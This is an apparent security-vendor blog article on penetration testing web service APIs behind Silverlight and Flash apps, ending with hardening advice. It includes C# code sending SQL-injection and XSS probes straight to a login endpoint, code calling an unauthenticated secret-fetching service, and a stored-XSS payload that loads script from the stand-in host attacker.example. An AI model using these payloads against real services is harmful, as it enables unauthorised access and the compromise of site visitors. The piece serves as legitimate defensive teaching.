Any Means Possible: Tales from Penetration Testing

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability

When we aren't fighting crime, taking over the world, or enjoying a good book by the fire, we here on the eEye Research team like to participate in the Any Means Possible (AMP) Penetration Testing engagements with our clients. For us, it's a great way to interact one-on-one with IT folks and really dig into the security problems that they are facing. We can sharpen our skills with real-world scenarios and practice the academic techniques presented in the industry, all the while helping to connect better with our customers and identify their security needs. During these engagements, we target a number of attack surfaces, ranging from exposed external server interfaces to client-side attacks launched on individual workstations. What I would like to talk about today is the web-based attack surface, and in particular a common problem we see consistently during our AMP engagements.

When talking about web vulnerabilities, you can't even begin to broach the subject without someone throwing out Cross-Site Scripting (XSS) or SQL Injection (SQLi). Unfortunately, poor little web services never seem to get any attention in the mix. Web service vulnerabilities are arguably just as widespread and dangerous as the aforementioned classes of vulnerabilities, but with so little talk and discussion around them, very rarely are these issues identified and remediated. Let's fix that.

Vulnerabilities in web services stem from the developer's line of thinking that says "I can trust the input from programs that I write." It's true that data coming from a known source you wrote can sometimes be trusted. It is not, however, true when that data travels over an untrusted medium such as the Internet. A common mistake in web design and development that we still see frequently is a server relying on input that was parsed and filtered by the client's browser. An example would be JavaScript running in the browser doing all of the filtering for malicious characters. Surely the JavaScript has filtered out all characters that could allow an attacker to insert malicious SQL queries into the back-end SQL database, right? Wrong: any data the server receives from a client's browser can just as easily be sent directly to the server from another, custom-written application. This means an attacker can bypass client-side SQLi and XSS protections by simply sending the requests straight to the server. Once traffic crosses the Internet, the server has no reliable way to determine how the data was sent; it may never have come from the application you intended it to come from. This makes exploitation of these vulnerabilities a bit more obscure, but still entirely possible. The same holds true for web service APIs used by client-side applications.
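
To make that concrete, here is a minimal sketch of how trivially client-side filtering is bypassed. The endpoint URL and form field names below are hypothetical, not taken from any real application; the point is simply that nothing obliges an attacker to route data through the page's JavaScript before it reaches the server.

// Minimal sketch (hypothetical endpoint and field names): the server must
// re-validate everything itself, because an attacker can skip the page's
// JavaScript filters entirely and talk to the server directly.
using System;
using System.Collections.Generic;
using System.Net.Http;
using System.Threading.Tasks;

class DirectPostExample
{
    static async Task Main()
    {
        using var client = new HttpClient();

        // A payload the page's JavaScript filter would have rejected,
        // sent straight to the form's action URL instead.
        var fields = new Dictionary<string, string>
        {
            ["username"] = "admin' OR '1'='1",               // classic SQLi probe
            ["password"] = "<script>alert(1)</script>"       // classic XSS probe
        };

        var response = await client.PostAsync(
            "https://www.example.com/login.aspx",            // hypothetical URL
            new FormUrlEncodedContent(fields));

        Console.WriteLine(await response.Content.ReadAsStringAsync());
    }
}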

Figure 1: Demo Microsoft Silverlight application. On the left, a failed attempt to log in and reveal the user's secret data; on the right, a successful login.

Many in-browser applications, such as those built with Adobe Flash and Microsoft Silverlight, communicate back to the server programmatically using web services. These services are exposed interfaces on the server that can be called directly from custom-written applications. In many situations, these services can expose potentially sensitive and privileged information that would otherwise not be accessible. Figure 1 shows a Microsoft Silverlight application that was constructed for demonstration purposes. This application is not vulnerable to XSS or SQLi and, to the average user, there is nothing about this application that allows someone without a password to access the legitimate user's secret data. However, what a lot of people don't seem to take into consideration is that you have access to anything that is running in your browser. Now, we can't pull the entire project down off the server, but we can reverse-engineer the application interface running in the browser to see if there is anything potentially sensitive being exposed.

The first thing that should be done when auditing web sites is to make sure all requests are being logged through a local request proxy. For this example, I will be using Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/) to log all of the requests that Firefox makes to our target Silverlight application. Right away, we see that the application requests an XAP file, shown in Figure 2. This is a fun thing to play around with that I will come back to later. As soon as we click the button on the page, we see the browser make a request to an SVC file; this is our web services interface, also shown in Figure 2.

Figure 2: Browser makes requests for an XAP file and an SVC file. The XAP file is loaded immediately into the browser when the application is started and the SVC file is loaded as soon as the user attempts to submit data back to the server.

Now, when we find a site serving up an SVC web services file, it's usually game over for that particular site. The reason is that these interfaces are usually trusted by the developer. Developers will assume that the only thing calling these exposed interfaces is the client application that they wrote. However, browsing to the service file directly in your favorite web browser will usually show you the basic interface of the exposed web service. The next step is creating a custom application to interface with the web service directly. You can use any language that you want as long as it can interface with a web server, but I usually like to use C# in Visual Studio. Creating the application is quite easy - simply create a new C# project and add a service reference to the hosted SVC file. Visual Studio will automatically import all of the references to everything exposed by the service. Figure 3 shows what is exposed by the sample service.

Figure 3: Object Viewer's list of the imported Web Services interface.

This service exports two functions: GetUserSecret and Login. The interesting thing here is that GetUserSecret takes a string and gives back a string, likely representing the secret data associated with the provided user. Now, it's perfectly possible that there is some form of authentication check on the server side when this function is called, ensuring no secrets are disclosed to unauthenticated clients. However, in many situations I have encountered, this is not the case. We can test whether the code properly checks for authentication by writing our own custom interface for the exposed web service. The following code snippet instantiates a client and queries for the secret data of two users without first authenticating with the server. Figure 4 shows the output from that program.

LoginService.LoginServiceClient client = new LoginService.LoginServiceClient();
Console.WriteLine("eEyeResearch's secret: "+client.GetUserSecret("eEyeResearch"));
Console.WriteLine("admin's secret: " + client.GetUserSecret("admin"));

Figure 4: Output from the code written to call the example service directly.

The output from our code shows that this exposed service is callable directly, without requiring any authentication. The only information needed is the user's name and, as many of you know from attacks that have made the press over the past year, that information can be acquired quite easily through social engineering or brute-force attacks.
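
For those who prefer not to rely on Visual Studio's generated proxy, the same test can be done by hand with WCF's ChannelFactory. The sketch below is an approximation rather than a reproduction of the demo project: the binding, endpoint address, contract namespace, and the exact shape of the Login operation are assumptions, and should be adjusted to whatever the target's metadata or your proxy logs actually show.

// Hand-rolled WCF client sketch. The contract namespace, binding, endpoint
// URL, and the Login signature are assumptions; only the GetUserSecret and
// Login operation names are known from the exposed service.
using System;
using System.ServiceModel;

[ServiceContract]
public interface ILoginService
{
    [OperationContract]
    string GetUserSecret(string userName);

    [OperationContract]
    bool Login(string userName, string password);   // assumed signature
}

class Program
{
    static void Main()
    {
        var factory = new ChannelFactory<ILoginService>(
            new BasicHttpBinding(BasicHttpSecurityMode.Transport),
            new EndpointAddress("https://www.example.com/LoginService.svc")); // hypothetical URL

        ILoginService client = factory.CreateChannel();

        // Call the "privileged" operation without ever calling Login.
        Console.WriteLine("admin's secret: " + client.GetUserSecret("admin"));

        ((IClientChannel)client).Close();
        factory.Close();
    }
}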

This vulnerability is quite straightforward, but I think many of you would be surprised how often we encounter issues very similar to this in real-world penetration testing scenarios. It's an easy mistake to assume that any malicious tampering with a web page will come through a browser or the front-end web application, but the simple truth is that this is not the case.

If you wanted to take this a bit further, you could examine the manifest files used by the client-side browser application. Remember the XAP file mentioned at the beginning? That file is actually a ZIP archive containing manifest information and the binary executable files used by the Silverlight application. Examining these files will show you all of the web service APIs that the application can potentially call, even the authenticated ones. This information has proven quite useful on various engagements. One simple web application that wasn't vulnerable to XSS or SQLi revealed a manifest of previously unknown web services, which eventually allowed us to download all of the information hidden behind the login page. Because these services were only referenced after the user had authenticated through the login screen, these APIs might never have been found in a purely unauthenticated audit had the manifest files not been checked for additional exposed interfaces.
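
Pulling the XAP apart requires nothing more exotic than a ZIP library. This is a minimal sketch, assuming you have already saved a copy of the XAP locally from your proxy logs; the file name is a placeholder.

// Minimal sketch: list the contents of a downloaded XAP (it is just a ZIP
// archive) and dump AppManifest.xaml, which names the assemblies the
// Silverlight client loads. Service endpoint details typically live in
// ServiceReferences.ClientConfig when the app uses generated proxies.
using System;
using System.IO;
using System.IO.Compression;

class XapPeek
{
    static void Main()
    {
        using (ZipArchive xap = ZipFile.OpenRead("App.xap")) // placeholder path
        {
            foreach (ZipArchiveEntry entry in xap.Entries)
            {
                Console.WriteLine(entry.FullName); // AppManifest.xaml plus the client DLLs
            }

            ZipArchiveEntry manifest = xap.GetEntry("AppManifest.xaml");
            if (manifest != null)
            {
                using (var reader = new StreamReader(manifest.Open()))
                {
                    Console.WriteLine(reader.ReadToEnd());
                }
            }
        }
    }
}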

As if freely available manifest information weren't enough, the DLL files present in this archive can also prove to be a lot of fun. Ask any professional or hobbyist reverse engineer: languages such as Java or C# are quite easy to decompile. Due to the managed nature of such languages, there are freely available tools that do quite a good job of turning the compiled binaries back into the original (or very similar) high-level code. These DLLs only represent the client-side code that Silverlight executes in the browser, so you won't be getting the original server code out of this. However, a very common mistake made by programmers is to incorporate some of the application logic into the user interface as well. In these situations, such reversing sessions may yield valuable information about how the application works behind the scenes. In fact, this has been used in the past to gain all kinds of interesting information about target applications, including default credentials to the authenticated sections of the application, which were set in a button click-event handler of the application's user interface.

Though this entire article has been focused purely on Silverlight, the same concept applies to most other client-side web applications out there. Often, these applications rely on web services to communicate with the server, for both unauthenticated and authenticated communications alike, and developers often rely on the client-side application to do all of the relevant filtering and data integrity checking of the information being sent to these web services.

Along with performing authenticated actions on behalf of an unauthenticated application, we have used these service APIs to inject malicious data into hosted material. My favorite case was an AMP engagement in which we attacked a Flash application that called a web service API in the background. This API was used to lay text over greeting card images hosted on the affected server. The Flash application filtered input to allow only alphanumeric characters, but calling the API directly allowed us to insert malicious JavaScript to sit on top of the images. Upon viewing the page or the image link directly, we gained the ability to execute arbitrary JavaScript in the user's browser or embed hidden iframes that could be used to host various exploits. The basic point here is that successful exploitation can yield a variety of things for the attacker. This isn't something that, when exploited, only dumps information or only changes the way a page is viewed; the limits of these vulnerabilities are determined only by the functionality of the web application.
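
For illustration only, the shape of that attack looked roughly like the following. Every identifier here is hypothetical (the real client's service is obviously not reproduced); the point is that the alphanumeric filter lived in the Flash front end, not in the service it called.

// Hypothetical reconstruction of the greeting-card attack, in the same
// generated-proxy style as the earlier snippet. The service, operation, and
// parameter names are invented for illustration.
GreetingCardService.CardServiceClient card = new GreetingCardService.CardServiceClient();

// A stored-XSS payload the Flash UI's alphanumeric filter would have blocked.
string overlay = "<script src=\"http://attacker.example/hook.js\"></script>";

card.SetCardText(1337, overlay); // hypothetical card ID and text-overlay call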

Problems centered on web service APIs can potentially be just as dangerous as an SQLi vulnerability. It's somewhat unfortunate that SQLi has become so trendy, taking away any deserved fame or glory from the other interesting web vulnerabilities. It's important to keep in mind that, though this was a heavily Microsoft- and Silverlight-focused example, the same issues apply across the board in many different web application technologies. The issue is actually very easy to audit for, especially if you already know exactly what your application should and shouldn't be able to do at every level of authentication.

If you manage servers hosting websites, or the websites themselves, I recommend taking a few minutes to sit down and browse through each of these services. Be aware of exactly what is exposed on the external-facing interfaces. If anything looks out of place, try connecting directly to the service and see what information is exposed and available to your users. Try preventing the service from displaying its metadata by removing the mex endpoint binding and setting httpGetEnabled for service metadata to false in the web configuration file. This prevents users from reading the web service descriptions and makes it nontrivial to arbitrarily connect and communicate with these services without prior knowledge of the internal workings of the application. These problems are quite easy to identify, often trivial to remediate, and proactively addressing them can save an organization from a serious compromise.
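
For WCF services in particular, that hardening is a small change to the web configuration file. The snippet below is a sketch rather than a drop-in config: the service and contract names are placeholders, and the key points are simply that no mex endpoint is declared and that httpGetEnabled is set to false.

<!-- Sketch only; service and contract names are placeholders. -->
<system.serviceModel>
  <services>
    <service name="MyApp.LoginService" behaviorConfiguration="NoMetadata">
      <endpoint address="" binding="basicHttpBinding" contract="MyApp.ILoginService" />
      <!-- No mexHttpBinding/IMetadataExchange endpoint is declared here -->
    </service>
  </services>
  <behaviors>
    <serviceBehaviors>
      <behavior name="NoMetadata">
        <serviceMetadata httpGetEnabled="false" />
      </behavior>
    </serviceBehaviors>
  </behaviors>
</system.serviceModel>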

•   •   •

This article was written by Jared Day, a researcher with eEye's Research Team led by Marc Maiffret.

If you are interested in learning more about our AMP services, you can visit our page here (http://www.eeye.com/services/penetration-testing).

More Stories By Jared Day

Jared Day is a Security Research Engineer on the eEye Research Team. He joined the research team in 2010 and works primarily as a security advocate for eEye clients, participating in and leading Any Means Possible (AMP) penetration tests, as well as conducting custom private research related to malware, threat, and patch mitigation analysis.
